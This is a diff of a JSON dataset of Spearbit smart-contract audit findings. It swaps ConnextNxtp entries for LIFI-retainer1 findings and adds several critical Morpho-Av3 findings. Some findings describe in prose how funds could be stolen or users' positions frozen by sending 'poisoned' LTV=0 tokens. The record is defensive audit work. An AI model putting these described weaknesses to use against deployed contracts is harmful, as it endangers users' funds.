"https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions CallBridge and CallBridgeCall do random external calls. This is done via a sepa- rate contract multicall SquidMulticall. This might be used to try reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "_calculateSwapInv and _calculateSwap can mirror each other's calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_calculateSwapInv could have mirrored the implementation of _calculateSwap uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or the other way around _calculateSwap mirror _calculateSwapInv and pick whatever is cheaper.", + "title": "Missing test coverage for triggerRefund Function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document that the virtual price of a stable swap pool might not be constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The virtual price of the LP token is not constant when the amplification coefficient is ramping even when/if token balances stay the same.", + "title": "Implicit assumption in MakerTeleportFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai),...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the reason for picking d is the starting point for calculating getYD using the Newton's method.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "d the stable swap invariant passed to getYD as a parameter and it is used as the starting point of the Newton method to find a root. This root is the value/price for the tokenIndex token that would stabilize the pool so that it would statisfy the stable swap invariant equation.", + "title": "Robust allowance handling in maxApproveERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Some tokens, like USDT, require setting the approval to 0 before setting it to another value. The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily maxApproveERC20() sets the allowance so high that in practice this never has to be increased. function maxApproveERC20(...) ... { ... uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the max allowed tokens in stable swap pools used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Based on the uint8 type for the indexes of tokens in different stable swap pools, it is inferred that the max possible number of tokens that can exist in a pool is 256. There is the following check when initializing internal pools: if (_pooledTokens.length <= 1 || _pooledTokens.length > 32) revert SwapAdminFacet__initializeSwap_invalidPooledTokens(); This means the internal pools can only have number of pooled tokens in 2, (cid:1) (cid:1) (cid:1) , 32.", + "title": "Unused re-entrancy guard", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The RelayerCelerIM.sol#L21 includes a redundant re-entrancy guard, which adds an extra layer of protection against re-entrancy attacks. While re-entrancy guards are crucial for securing contracts, this particular guard is not used.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Rename adoptedToLocalPools to better indicate what it represents", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools.", + "title": "Redundant duplicate import in the LIFuelFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and removing dupli- cate imports can streamline the contract and improve maintainability.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the usage of commented mysterious numbers in AppStorage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Before each struct AppStorage's field definition there is a line comment consisting of only digits // xx One would guess they might be relative slot indexes in the storage (relative to AppStorage's slot). But the numbers are not consistent.", + "title": "Extra checks in executeMessageWithTransfer()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function executeMessageWithTransfer() of RelayerCelerIM ignore the first parameter. seems this could be used to verify the origin of the transaction, which could be an extra security measure. It * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... { }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "RouterPermissionsManagerInfo can be packed differently for readability", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a differ- ent value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mapping have the same shared key which is the router.", + "title": "Variable visibility is not uniform", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In the current facets, state variables like router/messenger visibilities are not uniform, with some variables declared as public while others are private. thorchainRouter => is defined as public. synapseRouter => is defined as public. deBridgeGate => is defined as private", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Consolidate TokenId struct into a file that can be imported in relevant files", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same struc- ture/fields. If in future, one would need to update one struct the other one should also be updated in parallel.", + "title": "Library LibMappings not used everywhere", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The library LibMappings is used in several facets. However, it is not used in the following facets ReentrancyGuard AxelarFacet HopFacet.sol MultichainFacet OptimismBridgeFacet OwnershipFacet", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] - }, - { - "title": "Typos, grammatical and styling errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase.", + }, + { + "title": "transferERC20() doesn't have a null address check for receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. It would be best for readability and consistency change the following code to follow the same pattern if (_asset == _local) { return (_amount, _asset); }", + "title": "LibBytes can be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The following functions are not used concat() concatStorage() equal() equalStorage() toBytes32() toUint128() toUint16() toUint256() toUint32() toUint64() toUint8() toUint96() The call to function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the in-built slicing provided by Solidity. Refer to its documentation.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Fix/add or complete missing NatSpec comments.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Some NatSpec comments are either missing or are incomplete.", + "title": "Keep generic errors in the GenericErrors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been noticed that some of the contracts are re-defined errors. The generic errors like a WithdrawFailed can be kept in the GenericErrors.sol", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Define and use constants for different literals used in the codebase.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way it would be more clear the purpose of those values used and also the common literals can be consolidated into one place.", + "title": "Attention points for making the Diamond immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "There are additional attention points to decide upon when making the Diamond immutable: After removing the Owner, the following functions won't work anymore: AccessManagerFacet.sol - setCanExecute() AxelarFacet.sol - setChainName() HopFacet.sol - registerBridge() MultichainFacet.sol - updateAddressMappings() & registerRouters() OptimismBridgeFacet.sol - registerOptimismBridge() PeripheryRegistryFacet.sol - registerPeripheryContract() StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of DexManagerFacet.sol WithdrawFacet.sol Several Periphery contracts also have an Owner: AxelarExecutor.sol ERC20Proxy.sol Executor.sol FeeCollector.sol Receiver.sol RelayerCelerIM.sol ServiceFeeCollector.sol Additionally ERC20Proxy has an authorization mechanism via authorizedCallers[]", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... for consis- tency.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForEx- actOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value com- ponents. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted).", + "title": "Check on the final asset in _swapData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in majority of the facets (including CircleBridgeFacet). Ideally, every facet should have the check that the final receivingAssetId is equal to sendingAssetId.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use interface types for parameters instead of casting to the interface type multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Sometimes casting to the interface type has been performed multiple times. It will be cleaner if the parameter is defined as having that interface and avoid unnecessary casts.", + "title": "Discrepancies in pragma versioning across faucet implementations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Be aware of tokens with multiple addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... }", + "title": "Inconsistent use of validateDestinationCallFlag()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Highlighted code can be replaced with a call to validateDestinationCallFlag() function as done in other Facets.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Remove old references to claims", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds);", + "title": "Inconsistent utilization of the isNativeAsset function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The isNativeAsset function is designed to distinguish native assets from other tokens within facet- based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of the asset identification and processing within the facets.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Doublecheck references to Nomad", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad ,! BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if swap is needed. The local tokens will * necessary. In the event that the adopted assets *are* local nomad assets, no ,! BridgeFacet.sol:424: ,! InboxFacet.sol:87: RoutersFacet.sol:533: AssetLogic.sol:102: asset. ,! AssetLogic.sol:139: swap ,! AssetLogic.sol:185: swap ,! AssetLogic.sol:336: adopted asset ,! AssetLogic.sol:375: * @notice Only accept messages from an Nomad Replica contract. * @param _local - The address of the nomad representation of the asset * @notice Swaps an adopted asset to the local (representation or canonical) nomad * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Calculate amount of tokens you receive on a local nomad asset for the * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset ,! LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. ,! LibConnextStorage.sol:148: madUSDC on polygon). ,! LibConnextStorage.sol:204: LibConnextStorage.sol:268: madUSDC on polygon) * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> * this domain (the nomad local asset). * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> ,! ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which ,! references a 142", + "title": "Unused events/errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contracts contain several events and error messages that are not used anywhere in the contract code. These unused events and errors add unnecessary code to the contract, increasing its size.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document usage of Nomad domain schema", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However other locations don't mention this. This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema ,! * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema ,! struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... }", + "title": "Make bridge parameters dynamic by keeping them as a parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as a parameter to make them dynamic and easily changeable in the future. HopFacetOptimized.sol => Relayer & RelayerFee MakerTeleportFacet.sol's => Operator person (or specified third party) responsible for initiating minting process on destination domain by providing (in the fast path) Oracle attestations.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Router has multiple meanings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides Liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that what previously was BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router", + "title": "Incorrect comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The highlighted comment incorrectly refers USDC address as DAI address.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Robustness of receiving contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _execute- Calldata() and excessivelySafeCall() don't revert when the underlying call reverts This seems to be inten- tional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. The receiving contract already has received the tokens via handleOutgoingAsset() so must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ... } }", + "title": "Redundant console log", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contract includes Console.sol from test file, which is only used for debugging purposes. In- cluding it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Functions can be combined", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both xcall and xcallIntoLocal have same code except receiveLocal (which is set false for xcall and true for xcallIntoLocal) value. Instead of having these as separate function, a single function can be created which can tweak the functionalities of xcall and xcallIntoLocal on basis of receiveLocal value", + "title": "SquidFacet doesn't revert for incorrect routerType", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "If _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or Call- BridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when the combined with the issue \"Max approval to any address is possible\", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document source of zeroHashes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex\"0000000000000000000000000000000000000000000000000000000000000000\"; ... bytes32 internal constant Z_31 = hex\"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9\"; ,! ,! }", + "title": "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and \"pure\" supply), borrow and liquidate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, operations could revert. 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0. 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert. 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert. Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply Morpho's users could not be able to borrow Morpho's users could not be able to liquidate Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Document underflow/overflows in TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function index() has an overflow when _bytes derflow when _len == 0. These two compensate each other so the end result of index() is as expected. As the special case for _bytes == 0 is also handled, we assume this is intentional. However this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } }", + "title": "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, bor- row and liquidate operations could stop working", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert 1) Withdraw: if the asset withdrawn is collateral, the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0 2) Transfer: if the from is using the asset as collateral, is borrowing something and the asset transferred is an AToken with LTV > 0 the operation will revert 3) Set the reserve of an AToken as not collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0 the operation will revert Note that all those checks are done on top of the \"normal\" checks that would usually prevent an operation, de- pending on the operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral and the victim will suffer from all the side effects previously explained. While a \"normal\" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility to remove from the Morpho wallet the \"poisoned AToken\", part of the Morpho mechanics will break. Morpho's users could not be able to withdraw both collateral and \"pure\" supply. 6 Morpho's users could not be able to borrow. Morpho's users could not be able to liquidate. Morpho's users could not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Use while loops in dequeueVerified()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Within function dequeueVerified() there are a few for loops that mention a variable as there first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } }", + "title": "Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price which is different from the price that Aave would use.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Duplicate functions in Encoding.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byte- Hex(), encodeHex().", + "title": "Isolated assets are treated as collateral in Morpho", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Aave-v3 introduced isolation assets and isolation mode for users: \"Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling.\" The Morpho contract is intended not to be in isolation mode to avoid its restrictions. Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them which should not be possible: Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "Morpho-Av3", + "Severity: Critical Risk" ] }, { - "title": "Document about two MerkleTreeManager's", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues.", + "title": "Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho is handling it in the _assetLiquidityData function function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { ,! } // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. // In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user Health Factor. The Health Factor is used to Calculate both if a user can be liquidated and in which percentage the collateral can be seized. Calculate if a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= of liquidationThreshold, this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to Deny a user's collateral withdrawal (while an Aave user could have done it). Deny a user's borrow 